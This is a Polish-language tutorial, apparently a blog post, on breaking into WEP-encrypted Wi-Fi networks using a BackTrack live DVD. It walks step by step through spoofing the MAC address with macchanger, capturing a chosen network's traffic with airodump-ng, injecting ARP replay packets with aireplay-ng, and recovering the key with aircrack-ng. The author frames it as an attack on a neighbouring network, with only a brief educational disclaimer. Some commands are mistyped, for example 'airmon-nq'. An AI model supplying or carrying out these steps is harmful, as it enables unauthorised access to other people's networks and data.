BACKTRACK
Łamanie haseł sieci bez przewodowych nie jest takie trudne jak się wydaje, zabezpieczenia sieci szyfrowanych WEP możemy złamać w kilka minut, inne metody szyfrowania też idzie złamać lecz nie tak szybko. W tym poradniku zajmiemy się siecią Z szyfrowaniem typu WEP. Poradnik ten pisze wyłącznie w celach edukacyjnych, nie odpowiadam za wyrządzone szkody.
Łamanie hasła przeprowadzę za pomocą narzędzi black-track, atak ten przeprowadzę na jednej z lokalnych sieci wi-fi zabezpieczonej kluczem WEP.
BackTrack – do pobrania stąd, pobieramy w wersji ISO.
Active@ ISO Burner - lub inny program którym wypalisz dysk DVD
Po pobraniu obu plików, instalujemy Active ISO Burner po czym wypalamy pobrany wcześniej plik plik ISO. Jeśli obraz systemu został wypalony poprawnie resetujemy komputer i odpalamy płytkę DVD, system nie wymaga instalacji wiec nie musisz się martwic o miejsce na dysku.
U większości użytkowników prawdopodobnie będzie potrzeba przestawić w biosie domyślne urządzenie z którego komputer ma bootować. W tym celu wchodzimy do naszego biosu i szukamy opcji Boot jeśli taka znajdziemy jako pierwsze urządzenie bootujące wybieramy nasz napęd, w niektórych wersjach biosu urządzenie trzeba zmienić przesuwając nasz napęd na początek listy.
Następnie zapisz zmiany klikając na klawisz F10, po zapisaniu ustawień komputer automatycznie się zresetuje i uruchomi naszą płytę. Podczas uruchamiania się systemu wybieramy pierwszy tryb z największą rozdzielczością ekranu.
Po załadowaniu systemu uruchamiamy interfejs komendą:
startx
Następnie uruchamiamy konsole w celu uruchomienia sieci wpisując:
/etc/init.d/networking start
W celu sprawdzenia nazwy naszej karty bezprzewodowej wpisujemy:
airmon-ng
Nazwę karty sieciowej (kolumna interface) należny przepisać na kartkę gdyż posłuży nam ona w późniejszym ataku na sieć. Po czym wpisujemy następujące komendę:
airmon-nq “nazwa karty sieciowej”
Kolejnym krokiem będzie zatrzymanie pracy interfejsu sieciowego komendą:
ifconfig “nazwa karty” down
W celu zmienienia adresu mac naszej karty sieciowej wpisujemy następującą komendę:
macchanger –mac 00:11:22:33:44:55 “nazwa karty”
po wywołaniu komendy wyświetli nam się rzeczywisty adres mac naszej karty który powinniśmy spisać gdyż po zakończeniu łamania zabezpieczeń będzie trzeba go przywrócić z powrotem. Po czym wpisujemy:
airmon-nq start “nazwa karty”
Aby pobrać nazwę sieci bezprzewodowej wywołujemy komendę:
airodump-ng “nazwa karty”
Jeśli znaleźliśmy już interesującą nas sieć przerywamy operację wciskając CTRL + C, przepisujemy BSSID oraz nr kanału sieci która nas interesuje, po czym wpisujemy:
airodump-ng -w klucz -c “nr kanału sieci” –bssid “BSSID sieci” “nazwa karty”
Frazę
klucz możemy zastąpić inną, fraza ta jest nazwą pliku w którym
będą przechowywane informacje na temat sieci.
Otwieramy nową
konsolę nie zamykając aktualnej po czym wpisujemy:
aireplay-ng –arpreplay -b “BSSID sieci” -h “nasz adres mac” “nazwa karty”
Przechodzimy do pierwszego okna konsoli, jeśli liczba pakietów osiągnie 30000 przejdź do drugiego okna i naciśnij CRTL + C aby zatrzymać atak, po czym wpisujemy
dir
Na liście znajdujemy plik klucz-01.cap po czym wpisz następującą komendę:
aircrack-ng klucz-01.cap
W wyniku otrzymamy klucz do sieci bezprzewodowej.